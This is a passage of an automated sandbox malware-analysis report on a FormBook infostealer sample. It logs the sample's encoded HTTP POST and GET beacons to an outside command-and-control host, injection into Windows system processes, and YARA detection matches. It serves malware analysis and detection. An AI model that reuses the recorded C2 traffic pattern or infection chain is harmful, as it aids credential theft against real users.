                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.empowermedeco.com
                                                                            Origin: http://www.empowermedeco.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Referer: http://www.empowermedeco.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 76 39 31 72 6c 4f 32 6e 39 6f 4c 61 47 32 41 39 46 7a 47 48 47 79 56 53 31 58 6a 33 52 2b 57 52 6b 41 3d 3d
                                                                            Data Ascii: zh=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Jv91rlO2n9oLaG2A9FzGHGyVS1Xj3R+WRkA==
                                                                            Nov 25, 2024 14:00:46.264550924 CET1085INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Mon, 25 Nov 2024 13:00:46 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.1149997217.196.55.202803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 14:00:47.613682032 CET802OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.empowermedeco.com
                                                                            Origin: http://www.empowermedeco.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Referer: http://www.empowermedeco.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 64 51 68 78 43 48 59 50 7a 59 2f 4a 32 6a 6d 44 44 53 6d 41 76 31 4b 2f 52 54 4a 57 65 6b 6a 6b 6f 3d
                                                                            Data Ascii: zh=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhdQhxCHYPzY/J2jmDDSmAv1K/RTJWekjko=
                                                                            Nov 25, 2024 14:00:48.947330952 CET1085INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Mon, 25 Nov 2024 13:00:48 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.1149998217.196.55.202803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 14:00:50.292552948 CET1815OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.empowermedeco.com
                                                                            Origin: http://www.empowermedeco.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 1231
                                                                            Referer: http://www.empowermedeco.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 62 33 4e 6e 38 58 44 6c 46 66 7a 61 2f 49 66 64 6e 42 33 6d 7a 51 37 57 4b 65 6f 72 65 55 75 34 78 30 73 63 6b 71 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 35 4b 34 66 33 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 56 38 37 [TRUNCATED]
                                                                            Data Ascii: zh=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJyfWb3Nn8XDlFfza/IfdnB3mzQ7WKeoreUu4x0sckqATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO1OZn7hu5K4f3/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2ZwjLiViXzLp1YW7PSxYZU4ZA0Zr6PICBxqpQaYANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu8MmqUZpNHSSTPUB8ZW2tVpuzKjUAT+L/DYRlFEmMUr+LP5MxsmVh+kX2xBtSlChMIZMdrfC99MlSTpVkPCUJSM9DzozNJM/M111cAOyk7jpxg9w4vHBzY+3Dk6Iqjgoqhuy44hY940VKm1RSJhAbTNeY+Vdagik4IZKQ6/MSF4ftBmCamuYJijIhieIQaEVBiYpDJpEcBd4GcSFZFuVSofKZvMQJYLm91NAQsJ3/xf2B+nsFLywh2VUWnKR13rJWfje2VxH140ip8z0/xLddlXm4P8x5U1kALHoosi/t4LCnl0CQ/pNRJuBs785Rpk7UF53/buWJOJoeonn8HkJlH/B48jP+pwRZl9f9CECTs/NnXQpw9SPqexrnbf8T7d6vtuZoPXkkIlqPtqVy33vyhj/v5IYVmjdOF1+gpADjP7RqKUxcpUVhjfH2bNp0IMM3LDFqmcraCI2d2LB5OUsFB3nsdBlY6kFbDO6ryJaPSOSERN29h71noTGKCM3h0zsmEzuVfmxZAL2Y09L5MQi [TRUNCATED]
                                                                            Nov 25, 2024 14:00:51.550539017 CET1085INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Mon, 25 Nov 2024 13:00:51 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.1149999217.196.55.202803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 14:00:53.091805935 CET510OUTGET /fo8o/?zh=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&HpnH2=lZrlsdK8B4Q HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.empowermedeco.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 25, 2024 14:00:54.381639004 CET1227INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Mon, 25 Nov 2024 13:00:54 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/?zh=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&HpnH2=lZrlsdK8B4Q
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:07:56:57
                                                                            Start date:25/11/2024
                                                                            Path:C:\Users\user\Desktop\Certificate 11-19AIS.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Certificate 11-19AIS.exe"
                                                                            Imagebase:0x7b0000
                                                                            File size:1'203'200 bytes
                                                                            MD5 hash:1E1DB5D9C073FCFF1706C32D887E3E28
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:07:56:59
                                                                            Start date:25/11/2024
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Certificate 11-19AIS.exe"
                                                                            Imagebase:0x6b0000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:07:57:06
                                                                            Start date:25/11/2024
                                                                            Path:C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe"
                                                                            Imagebase:0x3f0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:4
                                                                            Start time:07:57:07
                                                                            Start date:25/11/2024
                                                                            Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                            Imagebase:0x280000
                                                                            File size:22'016 bytes
                                                                            MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:6
                                                                            Start time:07:57:21
                                                                            Start date:25/11/2024
                                                                            Path:C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe"
                                                                            Imagebase:0x3f0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:8
                                                                            Start time:07:57:33
                                                                            Start date:25/11/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6de060000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:4.1%
                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                              Signature Coverage:6.8%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:168
